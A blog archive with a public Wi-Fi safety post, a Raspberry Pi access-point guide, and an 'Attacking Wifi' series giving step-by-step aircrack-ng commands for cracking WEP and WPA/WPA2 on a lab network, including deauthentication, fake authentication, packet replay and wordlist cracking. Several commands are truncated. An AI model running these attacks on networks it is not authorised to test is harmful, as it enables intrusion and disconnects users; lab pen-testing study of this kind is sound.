Jesse P Lesperance

Dangers of using Open and Public Wifi Hotspots

Tue, 18 Apr 2023 00:00:00 +0000

Public Wi-Fi networks are a convenient way to stay connected to the internet while on the go. However, using public Wi-Fi can also be risky, as these networks are often unsecured and can leave your personal information vulnerable to hackers and cybercriminals. In this article, we’ll discuss the top 3 risks and dangers of connecting to public Wi-Fi networks and provide some recommendations on how to mitigate those risks.

Man-in-the-middle (MITM) attacks

A man-in-the-middle attack is a type of cyber attack where a hacker intercepts communication between two parties to steal sensitive information, such as login credentials, credit card numbers, and other personal data. In a public Wi-Fi network, MITM attacks are particularly common because these networks are often unsecured and have no encryption.

To carry out a MITM attack, a hacker sets up a fake Wi-Fi hotspot that appears to be a legitimate network. When users connect to the fake network, the hacker can intercept all communication and steal sensitive information. MITM attacks can be difficult to detect, as users may not realize that they are connecting to a fake network.

How to mitigate the risks:

One of the best ways to mitigate the risks of MITM attacks is to use a virtual private network (VPN). A VPN encrypts your data and creates a secure connection between your device and the internet. This makes it much more difficult for hackers to intercept your communication or steal your personal data.

It’s also important to be cautious when connecting to public Wi-Fi networks. Only connect to networks that require a password or other type of authentication. Avoid connecting to networks that are open and unsecured, as they are much more vulnerable to MITM attacks.

Malware

Malware is another common risk associated with public Wi-Fi networks. Malware is malicious software that can infect your device and cause a variety of problems, including stealing personal data, monitoring your activities, and slowing down your device.

Malware can be easily spread through public Wi-Fi networks, as these networks are often unsecured and have no protection against malicious software. In some cases, malware can be installed on your device without you even realizing it.

How to mitigate the risks:

The best way to mitigate the risks of malware is to use antivirus software on your device. Antivirus software can detect and remove malware from your device, as well as provide real-time protection against future threats.

It’s also important to be cautious when downloading files or clicking on links when connected to public Wi-Fi networks. Avoid downloading files or clicking on links from unknown sources, as they may contain malware.

Phishing

Phishing is a type of cyber attack where a hacker sends an email or message that appears to be from a legitimate source, such as a bank or social media platform. The message will often contain a link that, when clicked, takes you to a fake website where you are prompted to enter your login credentials or other personal information.

Phishing attacks can be particularly dangerous when using public Wi-Fi networks, as these networks are often unsecured and leave your personal information vulnerable to cybercriminals. Once hackers have access to your login credentials or personal information, they can use that information to steal your identity or access your financial accounts.

How to mitigate the risks:

One of the best ways to mitigate the risks of phishing attacks is to be cautious when clicking on links or entering personal information online. Always verify that the website you are visiting is legitimate and secure before entering any personal information.

It’s also important to use strong, unique passwords for all of your online accounts. Avoid using the same password for multiple accounts, as this can make it easier for hackers to gain access to your personal information.

Conclusion

Connecting to public Wi-Fi networks can be risky, as these networks are often unsecured and leave your personal information vulnerable to hackers and cybercriminals. The top three risks and dangers of using public Wi-Fi networks are man-in-the-middle attacks, malware, and phishing. However, by taking precautions such as using a VPN, antivirus software, and being cautious when clicking on links or entering personal information, you can mitigate these risks and protect your online security and privacy.

Remember to always be cautious when using public Wi-Fi networks and to only connect to networks that are secure and require a password or other type of authentication. By following these recommendations, you can stay connected while protecting your personal information from cyber threats.

Hacking WPA/WPA2 PSK

Mon, 04 May 2020 00:00:00 +0000

In this post we are are going to move on to cracking WPA/WPA2 Pre-shared keys using aircrack-ng. We will show you how to use aircrack-ng by itself, with an airolib-ng database and with John the Ripper to crack WPA/WPA2 passwords

The primary difference between cracking WEP and WPA/WPA2 is that while statistical methods can be used for speeding up the cracking of WEP pre-shared keys, only brute force can be used for WPA/WPA2 PSK.

Overview

Although WPA-encrypted networks do not suffer from the same cryptographic vulnerabilities as WEP networks, they can still sometimes be easier to crack due to users picking weak passwords. The impact of having to use the brute force approach is a substantial impact to efficiency. A large dictionary can to hours to days to process due to the computational intensity of brute forcing.

Target Information

BSSID: 34:08:04:09:3D:38
AP Channel: 3
ESSID: hitme (WPA2 PSK)
Client: 00:18:4D:1D:A8:1F
mon0: 00:1F:33:F3:51:13

Initial Attack Setup

The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.

root@attacker:~# airmon-ng start wlan0 3

This will set wlan0 into monitor mode as mon0 on channel 3

Recon

Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key

root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wpa-psk mon0

This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1. Our goal is to capture the WPA 4-way handshake, which takes place when a wireless client connects and authenticates to the access point.

De-authentication Attack

We could passively capture the WPA handshake by allowing airodump-ng to run until a new wireless client connects and authenticates to our target network. However, we could use a deauthentication attack on a connected client to speed up the process, which is what we will do here.

root@attacker:~# aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F mon0

After conducting the attack, you can look in the upper right hand corner of the airodump-ng output and should see the we hopefully captured the complete 4-way handshake. In the event of not successfully capturing in, we can either re-run the deauthentication attack against the same client or we can run the attack against a different client.

Preperation

Create Airolib Database (Optional)

Airolib-ng is designed to store and manage ESSID and password lists. It computes their PMKs and use them to crack WPA and WPA2 passwords. Since PMKs are reproducable due to the PMK always being the same for a given ESSID and password combination, we are able to pre-compute the PMKs for different combinations and possibly speed up the cracking of the handshake.

To get started, we need to create a file containing the ESSID of our target network.

root@attacker:~# echo hitme > essid.txt

This enables us to import the new text file into the database

root@attacker:~# **airolib-ng --import essid essid.txt**

This will automatically create the database if it does not exist.

We can verify this by providing the --stats operation to airolib-ng

root@attacker:~# **airolib-ng --stats**

In the output, you should see the ESSID you imported in the ESSID column. Now we need to import the password file.

root@attacker:~# **airolib-ng --import passwd **

You will see output indicating the file is being read, along with how many lines have been imported.

With all of the data imported, we now need to have airolib-ng all of the corresponding PMKs.

root@attacker:~# **airolib-ng --batch**

You will see output indicating how many PMKs were generated, the time taken and the generation rate. This can also be validated with the --stats operation also. You will see 100.0 in the Done column, indicating 100% completion.

Prepare John the Ripper

Using a wordlist with John the Ripper will not yield any results that aircrack-ng would render. For this reason, we will configure JTR to use word mangling.

nano /etc/john/john.conf

At the endo of the section List.Rules.Wordlist, add the following 2 lines

$[a-zA-Z0-9]$[a-zA-Z0-9] $[0-9]$[0-9]$[0-9]

We have added 2 rules. The first will add to characters on to each word in the wordlist, using only the defined charcter(upper and lowercase letters plus, zero to nine). The second adds 3 characters all 0-9.

coWPAtty Rainbow Tables

This is the main purpose behind coWPAtty, to make use of pre-compiled hashes for cracking WPA passwords. The pre-computed hashes are generated for each unique ESSID.

For this, we will use genpmk, a tool included with coWPAtty.

root@attacker:~# **genpmk -f -d hitme-hashes -s hitme**

Similar to airolib-ng, genpmk will provide output showing how many passphareses were testing and the total time taken, along with through put.

Crack the WPA Key

We have the 4-way handshake for the target network. Let’s look at how to crack this with aircrack-ng and airolib-ng.

Wordlist-based Crack

Very similar to how we executed a wordlist based crack for WEP, we shall also do for WPA/WPA2

root@attacker:~# **aircrack-ng -w wpa-psk-01.cap

We can analyze the output for aircrack-ng to see whether we were able to crack the WPA PSK or not.

Airolib Database-based Crack

Aircrack-ng has airolib-ng support built in natively. we just pass the -r parameter instead of the -w.

root@attacker:~# **aircrack-ng -r wpa-psk-01.cap**

In the output, you will notice a substantial increase in the number of keys tested per second.

Aircrack-ng with JTR

Now that John is configured to mangle words in the wordlist, we can increase our chances of finding the WPA key.

root@attacker:~# **./john –wordlist= --rules --stdout | aircrack-ng -d hitme -w - wpa-psk-01.cap**

Despite using JTR, you will see the aircrack-ng output on your screen, not JTR’s output.

coWPAtty Dictionary Mode

Dictionary mode is not the reason most people use coWPAtty, but it is still a good idea to know how to use it.

root@attacker:~# **cowpatty -r wpa-psk-01.cap -f -2 -s hitme

The one thing to note about the command above, is the use of the -2 parameter. This tells coWPAtty to use non-strict mode since coWPAtty has an issue with Airdump-ng captures.

coWPAtty Rainbow Tables Mode

Now that we have our handshake and pre-computed hashes, we can now crack the WPA password

root@attacker:~# cowpatty -r wpa-psk-01.cap -d hitme-hashes -2 -s hitme

coWPAtty’s output will display the PSK if we were successful.

Setting up a Rasberry Pi as a Wireless AP

Mon, 04 May 2020 00:00:00 +0000

Whether you are looking to expand your wifi network or want a wifi pen testing lab, it is always good to know how to turn a Raspberry Pi into a wireless access point.

Overview
Requirements
Instructions
hostapd sample configurations

Overview

The Raspberry Pi has many various uses. One of those uses is a Raspberry Pi can be a wireless access point. Why would someone use a Raspberry Pi as a wireless access point? Two primary reasons come to mind. First, if you are interested in hacking/pen testing wifi networks, a Raspberry Pi is an efficient access point and makes changing the AP configuration quite efficient. Second, with using 2 wifi adapters, you can turn it into a range extender for your home or business.

Requirements

There are a few items you will need for doing this project:

Rasberry Pi 3/4
2 usb wireless adapters(Pi3), or 1 usb wireless adapter(Pi4)
- If you plan to plug you Pi into ethernet, you can reduce the usb adapter requirement by 1
MicroSD card 16GB+ with Raspbian installed

Instructions

Update Raspbian

sudo apt-get update
sudo apt-get install

If any of the packages were updated, we recommend you reboot before proceeding.

Install hostapd and dnsmasq

hostapd is a user space daemon for access point and authentication servers.

sudo apt-get install hostapd

dnsmasq is a lightweight DNS forwarder and DHCP server.

sudo apt-get install dnsmasq

You will likely be prompted to confirm the install, press y to continue.

Once both are installed, we need to stop their services from running so that we can edit their configuration.

sudo systemctl stop hostapd
sudo systemctl stop dnsmasq

Configure a static IP

For simplicity, I am going to assume this is being used on a home network and we are using the standard home IP addresses, like 10.0.X.X. Given that assumption, let’s provide the IP address of 10.0.0.10 to either wlan0 or eth0, depending on whether you plan to use wifi or ether for the network connection.

NOTE: If yoy are planning to use this for wifi hacking, we suggest keeping it off your home network since the configuration will inherently be insecure.

sudo nano /etc/dhcpcd.conf

Once in the file, add the following to the bottom of the file

interface wlan0 (or eth0)
static ip_address=10.0.0.10/24
denyinterfaces eth0
denyinterfaces wlan0

Those denyinterfaces lines at the end are needed to make our bridge work. Now, save the file and exit.

Configure the DHCP server(dnsmasq)

We need a DHCP server so that we can dynamically distribute network configuration parameters, like IP address, for interfaces and services.

The default configuration is a bit bloated, so let’s rename the file to something else and create a fresh version

sudo mv /etc/dnsmasq.conf /etc/dnsmasq.conf.old
sudo nano /etc/dnsmasq.conf

Now let’s edit the file to configure our interface and DHCP IP range:

interface=wlan0
  dhcp-range=10.0.0.11, 10.0.0.30,255.255.255.0,24h

Configure the access point host software

Let’s open the hostapd config file

sudo nano /etc/hostapd/hostapd.conf

This should create a new file, however, if it opens an existing version of the config file, delete the contents before proceeding.

Let’s add the following into the file:

interface=wlan0
bridge=br0
hw_mode=g
channel=<channel>
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
ssid=<network>
wpa_passphrase=<password>

Make sure to set the channel, ssid and wpa_passphrase to your desired configuration. This configuration as you can probably tell is for creating a WPA2 access point.

Now we need to hell the system the location of the config file. For that we will do the following:

sudo nano /etc/default/hostapd

Find the line that starts with #DAEMON_CONF="" – delete the # and put the path to the config file we just created/edited:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Setting up traffic forwarding

If you were to connect to the access point now, you would notice that after connecting it would tell you that there is not internet access. This is because your Pi is not currently configured to forward the traffic it receives via wlan0 over you ethernet connection to your modem/gateway.

To adjust this, let edit the following file

sudo nano /etc/sysctl.conf

Find the line that begins with #net.ipv4.ip_forward=1, and delete the #, leaving the rest of the line intact.

Add iptables rule

Now we will setup IP masquerading for outbound traffic on eth0

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Not, let’s save the new rule:

sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"

Next, we set the rule to load on boot, by adding the following line to the /etc/rc.local file just above the line: exit 0:

iptables-restore < /etc/iptables.ipv4.nat

We are almost finished configuring the Pi as a fully functional access point. The last task is adding a bridge to pass all the traffic between the wlan0 and eth0 interfaces.

We will need to install another packet to achieve this:

sudo apt-get install bridge-utils

Add the new bridge

sudo brctl addbr br0

Let’s add our eth0 interface to the bridge

sudo brctl addif br0 eth0

And now we just need to edit the interfaces file to add the bridge

sudo nano /etc/network/interfaces

Now, add the following lines to the bottom of the file:

auto br0
iface br0 inet manual
bridge_ports eth0 wlan0

Phew, we are done, now we need to reboot and when the Pi comes back up, it should be a working access point.

sudo reboot

hostapd sample configurations

The following examples are overly simplistic and the minimal needed for running hostapd. There are quite a few possibly settings the can be added and should be added to the configuration if you are doing anything more than setting up a Wifi pen testing lab.

WEP Open Authentication

interface=wlan0
driver=nl80211
bridge=br0
hw_mode=g
channel=<channel>
wmm_enabled=0
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=2
ssid=<network>

WEP Pre-Shared Key Authentication

The key length should be 5, 13, or 16 characters, or 10, 26, or 32 digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or 128-bit (152-bit) WEP is used

interface=wlan0
driver=nl80211
bridge=br0
hw_mode=g
channel=<channel>
wmm_enabled=0
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=2
wep_default_key=0
wep_key0=<key>
ssid=<network>

WPA-PSK

interface=wlan0
driver=nl80211
bridge=br0
hw_mode=g
channel=<channel>
wmm_enabled=0
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
ssid=<network>
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_passphrase=<password>

WPA2-PSK

interface=wlan0
driver=nl80211
bridge=br0
hw_mode=g
channel=<channel>
wmm_enabled=0
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
ssid=<network>
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=<password>

WPA2 Enterprise

Here is a configuration that uses hostapd’s internal RADIUS server, though it is possible to use FreeRADIUS as well.

/etc/hostapd.conf

interface=wlan0
ctrl_interface=/var/run/hostapd
ctrl_interface_group=wheel
ssid=<network>
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
macaddr_acl=0
auth_algs=1
own_ip_addr=127.0.0.1
ieee8021x=1
eap_server=1
eapol_version=1

Add the path for the EAP server user database to the end of the file

eap_user_file=/etc/hostapd_eap_user
ca_cert=/etc/ssl/<ca cert>
server_cert=/etc/ssl/<ssl cert>
private_key=/etc/ssl/<private key>

/etc/hostapd_eap_user

"jesse@domain.tld" PEAP [ver=0]
"jesse@domain.tld" MSCHAPV2 "<passphrase>" [2]

To make things more secure, you could just use this one line to require a client certificate

"jesse@domain.tld" TLS

Bypassing WEP Shared Key Authentication

Mon, 27 Apr 2020 00:00:00 +0000

Up to this point, our attacks have been focused on WEP access points that were configured with open authentication.

Now, we will focus on a WEP access point using a shared key for authentication.

Overview

Unlike open authentication, shared key authentication requires more than just knowledge of the SSID, the same secret key must by known by the client and access point.

For this scenario, we will be using the information below to illustrate how to conduct the attack and attain the WEP key.

Target Information

BSSID: 34:08:04:09:3D:38
AP Channel: 3
ESSID: hitme (Shared Key Authentication)
Client: 00:18:4D:1D:A8:1F
mon0: 00:1F:33:F3:51:13

Initial Attack Setup

The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.

root@attacker:~# airmon-ng start wlan0 3

This will set wlan0 into monitor mode as mon0 on channel 3

Recon

Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key

root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wep1 mon0

This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1

Despite have shared key authentication configured on the access point, the AUTH column in airodump will not display SKA until a wireless client authenticates to the network.

Authenticate

Since the AUTH column is blank, we conduct a fake authentication attack in order to be able to communicate with the AP.

root@attacker:~# aireplay-ng -1 0 -e hitme -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

If the output from the fake authentication attack specifies AP rejects open-system authentication, we know that the access point is configured for share key authentication.

We need to acquire a PRGA XOR file before we can conduct a successful fake authentication attack on the access point. This file is acquired what a client connects to the network, which in a real world network environment can take a while to capture. You really have 2 options when it comes to this: 1 Be patient and wait for a client to connect, this is you only option if there are no currently connected clients on the network 2 Run a deauthentication attack on one of the connected clients to force the client to reassociate to the network, allowing us to capture the shared key authentication handshake.

After successfully completing the capture of the handshake, airodump with now show SKA in the AUTH column for the access point

Deauthentication Attack

Since it is both faster and easy to deauthenticate a client, we will use that route in this scenario.

root@attacker:~# aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F mon0

After, the client reconnects to the network and airodump will display that is has captured the keystream.

Shared Key Fake Authentication Attack

Now that we have the PRGA XOR file for the network, we can now conduct the shared key fake authentication attack, which is largely the same as the normal fake authentication attack.

root@attacker:~# aireplay-ng -1 0 -e hitme -y wep1-34-08-04-09-3D-38.xor -a 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

The output from the attack should show that is was successful, which we can verify by checking that airodump shows our mac address as being associated with the access point.

ARP Request Replay Attack

Now that we have gotten past the hurdle of shared key authentication on the access point, we can attack the access point as we did in the Hacking WEP With Connected Clients scenario. In this case, we will use the ARP request replay attack due to its extreme reliability.

root@attacker:~# aireplay-ng -3 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

Now, aireplay is waiting for an ARP packet to appear on the network.

Deauthentication Attack

We can expedite this process by deauthenticating a connected wireless client. Upon reconnection, it is highly likely the client will send an ARP packet.

root@attacker:~# aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F mon0

Watching our ARP request replay attack, as soon as the client reconnects to the network, it catches an ARP packet and injects it into the network.

Checking back to airodump, we can see that IVs are being captured at the rate of a couple hundred per second

Crack the WEP Key

Now that we have captured around 30,000 IVs, we just need to run aircrack-ng against our running capture.

root@attacker:~# aircrack-ng wep1.cap

Now we should be presented with the WEP key. If however, aircrack was unable to successfully crack the key, with leaving both the airodump capture running along with aircrack, aircrack will reattempt to crack the key every 5000 new IVs captured.

Hacking Clientess WEP Networks

Sat, 25 Apr 2020 00:00:00 +0000

In the last couple of posts, we have covered hacking WEP networks that have connected clients. What happens if there are no connected clients on the wireless network to help generate our ARP request? There are 2 attack methods that are usable in this scenario, KoreK chopchop and the fragmentation attack.

Overview

There are times where you will find yourself in a place where the WEP wireless network you are pentesting/hacking has no connected clients. This limits our ability to generate ARP packets on the network. However, there are 2 attacks in the aircrack-ng arsenal that can help us in this situation, KoreK chopchop and the fragmentation attack.

For this scenario, we will be using the information below to illustrate how to conduct the attack and attain the WEP key. There are several different methods of executing this attack. I am only showing one of them here. I may cover the others in a different post.

Target Information

BSSID: 34:08:04:09:3D:38
AP Channel: 3
ESSID: hitme (Open Authentication)
Client: 00:18:4D:1D:A8:1F
mon0: 00:1F:33:F3:51:13

Initial Attack Setup

The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.

root@attacker:~# airmon-ng start wlan0 3

This will set wlan0 into monitor mode as mon0 on channel 3

Recon

Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key

root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wep1 mon0

This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1

Authenticate

We conduct a fake authentication attack in order to be able to communicate with the AP. Unlike in the previous posts, we will set a reassociation timer so that is doesn’t time out

root@attacker:~# aireplay-ng -1 6000 -e hitme -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

This allows us to associate with the access point and keeps our session alive.

Fragmentation Attack

The first of the 2 methods of attack we will be using is the Fragmentation Attack. I have personally had more success using this method than I have with using the KoreK chopchop attack.

The Fragmentation Attack will help us attain the PRGA file. While this file is not the WEP key, it can be used to craft a packet that can be used in various injection attacks. The Fragmentation Attack requires at least one data packet to be received from the AP before an attack can be initiated.

root@attacker:~# aireplay-ng -5 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

Once the attack is launched, Aireplay starts to listen for a packet that can be used and when it finds a candidate, you will be prompted about using the packet in the attack.

Crafting a Packet with the PRGA

Now that we have the PRGA file for the network, we can use packetforge-ng to craft an ARP Request Packet.

root@attacker:~# **packetforge-ng -0 -a 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 -k 255.255.255.255 -l 255.255.255.255 -y crafted-packet -w

One note on selecting the source and destination IP addresses, many APs will respond properly if you use 255.255.255.255 for both.

KoreK ChopChop Attack

Now, let’s look at the KoreK ChopChop Attack. When successful, it can decrypt WEP data packets without knowing the WEP key. Additionally, it can even work against dynamic WEP.

Not all APs are vulnerable to the KoreK ChopChop Attack. Some APs will drop packets shorter the 60 bytes.

root@attacker:~# aireplay-ng -4 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

Similar to the Fragmentation Attack, after launching the chopchop attack, you will be prompted to select the packet for the attack. Additionally, the keystream will be saved into a XOR file that can be used to create a packet with packetforge-ng, using the packetforge command above.

Interactive Packet Replay

Now we can take our ARP request packet that we crafted and inject it into the network with the Interactive Packet Replay to generate the IVs needed for cracking the WEP key.

root@attacker:~# aireplay-ng -2 -r crafted-packet mon0

When prompted to use the crafted packet, enter y to start the injection.

If you check airodump, you should see the number of packets between your client and the AP should be constantly increasing.

Crack the WEP Key

Now, we just need to run aircrack-ng against our running capture.

root@attacker:~# aircrack-ng wep1.cap

Now we should be presented with the WEP key.

Hacking WEP via a Client

Thu, 23 Apr 2020 00:00:00 +0000

In this post we will discuss how to attack a client to force it to generate new IVs rather than the access point.

Overview

While it is true that most of the time, hacking a WEP network is accomplished by attacking the access point by generating a packet, that then would be replayed in an effort to get the access point to generate new packets with new IVs.

However, there are some reasons for attacking the client instead of the AP.

Some access points max out at 130,000 unique IVs
Some access points enforce client-to-client controls
MAC Address whitelisting/restrictions
Some newer access points can eliminate weak IVs
You are unable to successfully fake auth the access point
You are out of range for the access point, but are in range of a client

For this scenario, we will be using the information below to illustrate how to conduct the attack and attain the WEP key. There are several different methods of executing this attack. We are only showing one of those methods here, though, we may cover the other methods in a later post.

Target Information

BSSID: 34:08:04:09:3D:38
AP Channel: 3
ESSID: hitme (Open Authentication)
Client: 00:18:4D:1D:A8:1F
mon0: 00:1F:33:F3:51:13

Initial Attack Setup

The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.

root@attacker:~# airmon-ng start wlan0 3

This will set wlan0 into monitor mode as mon0 on channel 3

Recon

Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key

root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wep1 mon0

This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1

Authenticate

Now, while is isn’t required for this attack, we will conduct a fake authentication attack against the AP for 2 reasons. First, always a good practice to conduct a fake authetication attack against a WEP AP. Second, having you MAC associated with the access point can make this attack more reliable.

We conduct a fake authentication attack against the AP

root@attacker:~# aireplay-ng -1 0 -e hitme -a 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

This allows us to associate with the access point.

Generating Weak IVs

Now we can launch the Interactive Packet Replay Attack. THis attack allows us to choose a specific packet for replaying/injecting against our target network. To achieve our goal, a packet that will be “naturally” successful in generating new initialization vectors must be selected.

In this scenario, we are going to attempt to use the natural packet selection method of attack. We are going to capture packets that are within a desired size range and that have the fromDS flag set.

root@attacker:~# aireplay-ng -2 -b 34:08:04:09:3D:38 -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0

Cracking the WEP Key

Once we have captured a substantial number of weak IVs, 250,000 for 64-bit keys and 1.5 million for 128-bit keys, we can now use aircrack-ng to crack the key. For this we have 2 options.

We are going to use the PTW Crack method. It should be noted, this method only works with ARP request/reply packets.

root@attacker:~# aircrack-ng -z wep1.pcap

This should result in displaying the network’s WEP key.

Hacking WEP With Connected Clients

Wed, 18 Mar 2020 00:00:00 +0000

This post will build off of the Attacking Wifi Series - Overview & Commands post. We will look at how to use different Wifi attack commands to crack the key of a WEP AP with at least 1 connected client.

Overview

Most technically savvy individuals know that WEP encryption is a serious no-no, though for various compatibility reasons, many corporate environments are still using WEP encryption in their wireless networks.

For this scenario, we will be using the information below to illustrate how to conduct the attack and attain the WEP key.

Target Information

BSSID: 34:08:04:09:3D:38
AP Channel: 3
ESSID: hitme (Open Authentication)
Client: 00:18:4D:1D:A8:1F
mon0: 00:1F:33:F3:51:13

Initial Attack Setup

The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.

root@attacker:~# airmon-ng start wlan0 3

This will set wlan0 into monitor mode as mon0 on channel 3

Recon

Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key

root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wep1 mon0

This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1

Authenticate

Now, we conduct a fake authentication attack against the AP

root@attacker:~# aireplay-ng -1 0 -e hitme -a 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

This allows us to associate with the access point.

Generating Weak IVs

Now we can launch the ARP Request Replay Attack

root@attacker:~# aireplay-ng -3 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

You may have to wait a bit until an ARP request shows up on the network, this will depend on the amount of traffic on the network. You will see the Data field in the airodump session rapidly increasing as the weak IVs are being captured.

To help with this, we can use the Deauthentication Attack

root@attacker:~# aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F mon0

This will deauthenticate the client from the AP, forcing the client to send ARP packets to the AP as it reconnects, which we will need to replay to help force the AP to generate a large number of weak IVs.

Cracking the WEP Key

Once we have captured a substantial number of weak IVs, 250,000 for 64-bit keys and 1.5 million for 128-bit keys, we can now use aircrack-ng to crack the key. For this we have 2 options.

The first method, is the default IV-based cracking method.

root@attacker:~# aircrack-ng wep1.pcap

The other option, which typically is a faster option, is the PTW Crack method. It should be noted, this method only works with ARP request/reply packets.

root@attacker:~# aircrack-ng -z wep1.pcap

The result of either of these commands should result in the WEP Key

Overview & Commands

Tue, 03 Dec 2019 00:00:00 +0000

Welcome to the Attacking Wifi Series. This series of blog posts will cover different scenarios around pen testing and Hacking Wifi.

This post will highlight many of the different aircrack-ng commands used in hacking/pen testing wireless networks. This post does not go into the how, but is more of a reference of the commands and parameters.

Posts in this series
General
Cracking
WEP Attacks
WPA Attacks

Posts in this Series

Since this series will be covering several Wifi hacking scenarios, we have decided to make each scenario its own post. Each post will walk you through the steps of the attack. While the steps provided are sufficient for carrying out the attacks, it is recommended that you attain an understanding of the attacks and why they work. Information is provided to allow you to setup each scenario in your own wifi lab so that you can actually practice the attack. If you don’t have a spare AP to use for this, check out Rasperry Pi as an Wifi AP on how to create a wifi ap on a raspberry pi for the purpose of practicing hacking wifi.

Below is a list of posts for this series.

Overview & Commands <– This post
Hacking WEP with Connected Clients - Published on 3/18/20
Hacking WEP via a Client - Published on 4/23/20
Hacking Clientless WEP Networks - Published on 4/25/20
Bypassing WEP Shared Key Authentication - Published on 4/27/20
Hacking WPA/WPA2 PSK - Published on 5/4/20

General

Monitor Mode

There are a couple different options for putting your wifi adapter into monitor mode.

iw dev <interface> set monitor none

airmon-ng start <interface>

Scanning Networks

Airodump-ng is used to scan for wifi networks and clients that are in the range of your wireless card

airodump-ng -c <channel> -w <capture> --wps --band abg --essid <essid> --bssid <bssid> <int>

The required parameters

<int> The wireless interface that is in monitor mode

The following flags are all optional

-c <channel> This will filter your scan to a specific wifi channel
--wps This flag will include WPS information for wireless networks found
-w <capture> This flag will write the scan results to a file
--band <bands> This flag allows you to only scan wifi networks operating on specified bands
--essid <essid> This flag will filter the scan to a specific Client
--bssid <bssid> This flag will filter the scan to a specific AP

Deauthentication Attack

This attacks sends disassociate packets to one or more clients connected to a specific AP

aireplay-ng -0 <num> -a <ap> -c <client> <int>

All parameters and flags are required

-0 Deauthentication attack method
<num> The number of deauths to send, 0 will send continuously
-a <ap> The mac address of the AP
-c <client> The mac address of the client to deauthenticate
<int> The wireless interface to use

Cracking

The following are various methods that can be used to crack the authentication of wireless networks.

IV-based Crack

The following is a method of IV-based cracking. This is aircrack-ng’s default methed of cracking when no flags are provided. This method only works for WEP, not WPA/WPA2/WPA3.

aircrack-ng <capture>

PTW-based Crack

The PTW attack is both the newest and most powerful WEP attack. It only require 20,000 to 40,000 packets to be successful, though in some cases as many as 70,000 packets could be needed for a successful attack.

aircrack-ng -z <capture>

-z Invokes WEP PTW Attack mode

Word List-based Crack

This method works for both WEP and WPA-PSK cracking.

aircrack-ng -w <wordlist> <capture>

-w <wordlist> The wordlist to use to try and crack WEP/WPA-PSK

If the capture file does not contain the APs SSID, you will have to use the following command to specify the extra information aircrack needs for generating the PMKs

aircrack-ng -w <wordlist> -e <essid> -b <bssid> <capture>

-e <essid> The SSID of the AP
-b <bssid> The mac address of the AP

Airolib DB Crack

Airolib-ng is a tool for managing and storing ESSIDs and password lists, compute their Pairwise Master Keys, and use them to crack WPA and WPA2 passwords.

aircrack-ng -r <dbName> <capture>

-r <dbName> - The name of the airolib-ng database

JTR-based Crack

This method uses John the Ripper and a wordlist while applying word mangling rules to attempt to crack a WPA/WPA2 Password

john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e <essid> -w - <capture>

--wordlist=<wordlist> - The word list to use
--rules - apply word mangling rules

WEP Attacks

Fake Authentication

The fake authentication attack allows you to associate to an access point using either of the two types of WEP authentication: the open system and shared key authentication.

This attack is useful in scenarios where there are no associated clients and you need to fake an authentication to the AP.

aireplay-ng -1 0 -e <essid> -a <ap> -h <you> <interface>

-1 - Fake Authentication Attack
0 - The reassociation timing in seconds
-e <essid> - The wireless network name (ESSID)
-a <ap> - The AP MAC address
-h <you> - Your attacking MAC address

ARP Request Replay Attack

The ARP request replay attack is the most effective way to generate new initialization vectors and of all the attacks Aireplay has to offer, this attack is probably the most reliable.

